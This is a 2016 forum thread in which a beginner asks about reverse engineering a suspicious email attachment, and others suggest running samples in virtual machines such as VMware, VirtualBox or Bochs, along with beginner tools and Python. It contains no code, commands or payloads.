Does anybody here reverse engineer viruses?
16 05 May 2016 16:44 by u/JamesRussell
One of my very lesser known emails ( as in never used on sites ) received a very obvious spam/virus email with the title "I see you" and it also made its way past gmails spam filter so I figure it's got to be more than your average virus if anybody wants a crack at it I can forward the message to one of your sanitized throwaways.
Or if there is a more specialized subverse for this question I can post it there.
Thanks guys.
22 comments
7 u/Jefiakra 06 May 2016 01:40
I analyze malware professionally. The fact that it got past Gmail's spam filter doesn't mean much. While I'm not really interested in analyzing your sample (I have access to pretty much all of the fun malware I could possibly want, and this is probably just a banking trojan), I can make a few recommendations for free tools that are usable by a beginner. Obviously, you should only run malware in VMs (I prefer VMware Workstation/Fusion, personally), so keep that in mind if you do decide to look at the thing yourself; you should probably download directly into the VM, in case an exploit kit such as Angler is being used.
All of these tools are relatively easy to use. Google is your friend here, but if you have specific questions, feel free to ask in response or a PM.
0 u/JamesRussell [OP] 06 May 2016 07:54
God damn that is exactly the type of information I needed on top of what others provided, I'm definitely getting into learning all about how to do this stuff because it's so interesting.
Do you have any opinion on qubes or are the vms you mentioned better?
Thanks for all the resources :)
2 u/Jefiakra 07 May 2016 01:33
Qubes is a Linux distribution that runs every program in its own, Docker like, container. That's not a VM; it's an OS. It can't run Windows programs without Wine, and I'm not sure how secure Wine is on Qubes. I've looked at Qubes before, but I've never seen any formal inquiry into the claims it makes about its security features.
Virtualbox and VMware allow you to run whole operating systems in their own container. While these can be insecure if improperly configured, they're probably secure if they are (I say probably, because lord knows some government agency has some VM-breaking exploit, but that's not really an issue here), and considered safe for general use. The most secure way to run malware (only relevant for really nasty APTs like the next Stuxnet or something) is probably Bochs, which emulates the hardware rather than using CPU virtualization functionality, but that's slow.
0 u/JamesRussell [OP] 07 May 2016 09:35
I'm glad I asked instead of first trying qubes haha
I'll definitely check out virtualbox and VMware though and see how it goes.
Anything you feel most people forget about securing on vms? I'm the type to try find out all the security issues before doing anything that could possibly become a problem.
0 u/Jefiakra 07 May 2016 16:20
"Ease-of-use" devices, snapshots, and networking are the three biggest things to worry about, in my opinion, though I wouldn't know about anyone forgetting about them. These are honestly just rules of thumb. I break all of them, but you probably shouldn't unless you have a very good idea of the consequences, as you have to take other, more convoluted precautions (which I'm not going over).
1 u/elcob32 05 May 2016 17:21
I've played with a few just to see what makes them work. For the most part the subject isn't all that interesting to me since I don't get paid for that knowledge the same way I get paid for more commercial programming work.
1 u/JamesRussell [OP] 05 May 2016 17:27
It seems quite interesting to me, have you done it much?
I'm just at the beginning stages of coding so I obviously wouldn't have the skills to reverse engineer a virus but I would hopefully like to be able to at some point in future.
How long did it take before you had the skills to reverse engineer?
1 u/elcob32 05 May 2016 17:40
I've only ever done it with the virus' that are emailed to me. I have also programmed a couple of my own just to see if I could. I never made anything more malicious than a virus that could quickly overload a computers memory by abusing a web browsers ability to process JavaScript code. That would cause a blue screen of death in older versions of windows and force a reboot, but didn't do any permanent damage.
You can start tinkering with reverse engineering inside your first year of programming if you really want to. It's kind of tedious though since decompiled programs have obscure variable names and no comments. That makes the code difficult to read and understand. To make them easier to work with you kind of need to use an editor that can re-factor variable names as you come to understand their purpose. Eventually that makes the code more readable and even usable if you so desire.
0 u/JamesRussell [OP] 05 May 2016 17:48
So what would you be looking for in viruses that are emailed to you? Mistakes in the original programmers code? What would that reveal about the programmer?
I think I will probably start out with Python because the ability to create scripts would be a really nice thing to have.
Do you have any resources you think would be good to start out with in programming?
Sorry for all the questions, I just find this whole thing super interesting :)
1 u/elcob32 05 May 2016 18:08
The last time I took the time to reverse engineer a virus it was because it was written in VBScript. I found that fascinating because that is an interpreted language and not compiled code. I wanted to know what it was the programmer was attempting to exploit on the target machine. The scope of his potential victims was limited to windows computers, but depending on the exploit the virus may have been even more targeted than that. As it turs out it was more limited to that, the virus was targeting Microsoft Office's ActiveX components. Most windows computers had those files regardless of whether or not MS Office was installed, but to trigger the exploit either outlook or word needed to be opened. Only people with MS Outllok or MS Word would be affected. As far as what id did, basically it made several calls back to various servers and await a response most likely to install another more advanced virus.
I don't use python a lot personally, but I would highly recommend it to new programmers. It is easy to use, read, and you still accomplish some impressively advanced software with it. There are also libraries that make it so you can write and deploy cross-platform desktop apps (TKinter) and is even a new open source platform for web development (Django) that is getting to be pretty impressive.
Not sure which resources would best suit you because we all learn in our own ways, but if you want to mess with reverse engineering you could download a copy of the linux distro "Kali", install it on it's own partition or thumb drive. It comes with several tools for reverse engineering so between their built in documentation and a little google-fu, you should be able to figure out how that gmail immune virus was supposed to affect your machine.
0 u/JamesRussell [OP] 05 May 2016 18:26
Oh so you would also find out the exploit they were trying to exploit? That's fascinating because if it was a previously unknown exploit you could potentially cash in on bug bounty programs as well as finding out what the system target was.
Could you interact in any way any with the servers it was trying to call?
I'll definitely be checking out Django tho because I'm a big supporter of open source, so thanks for the heads up.
Yeah I've been recently messing around with the terminal in Ubuntu recently but I was planning on changing distros and another friend also recommended kali so I'll definitely check that out too.
Thanks for all the information man :)
1 u/elcob32 05 May 2016 19:05
Bug bounty programs are typically offered to people who are exploiting servers, not just finding exploits in desktop software. Either way, considering the time it normally takes to do that kind of work, bug bounty programs don't often pay that well.
As for the servers they were not interactive at all. There probably would have been some limited interaction if I had downloaded the file it was calling and attempted to reverse engineer that, but I really wasn't interested enough to take it that far.
0 u/JamesRussell [OP] 05 May 2016 19:32
Huh, TIL. Ah well the money isn't a huge thing to me anyway but I love the idea of seeing how deep a rabbit hole like this would go. :)
1 u/elcob32 05 May 2016 19:35
Spoiler Alert. It typically ends with a botnet.
0 u/JamesRussell [OP] 05 May 2016 20:05
Now you've ruined the whole movie!
How would you know when you get to the creamy botnet layer?
1 u/diodine 06 May 2016 03:40
I do. I generally don't spend too much time though being a hobbyist rather than a full time reverse engineer, but if the malware isn't overly complex I will look at it. PM me the files if you want.
0 u/JamesRussell [OP] 06 May 2016 08:00
You're a legend man :) Just even a simple glance at the code to see what it was targeting would be huge for me because I feel this virus was targeted since I never used the email in question anywhere on the internet.
I haven't downloaded it yet because I'm still going through the wealth of information all of the other providers have posted, but if you have a free sanitised/throwaway email you could pm me I could forward it.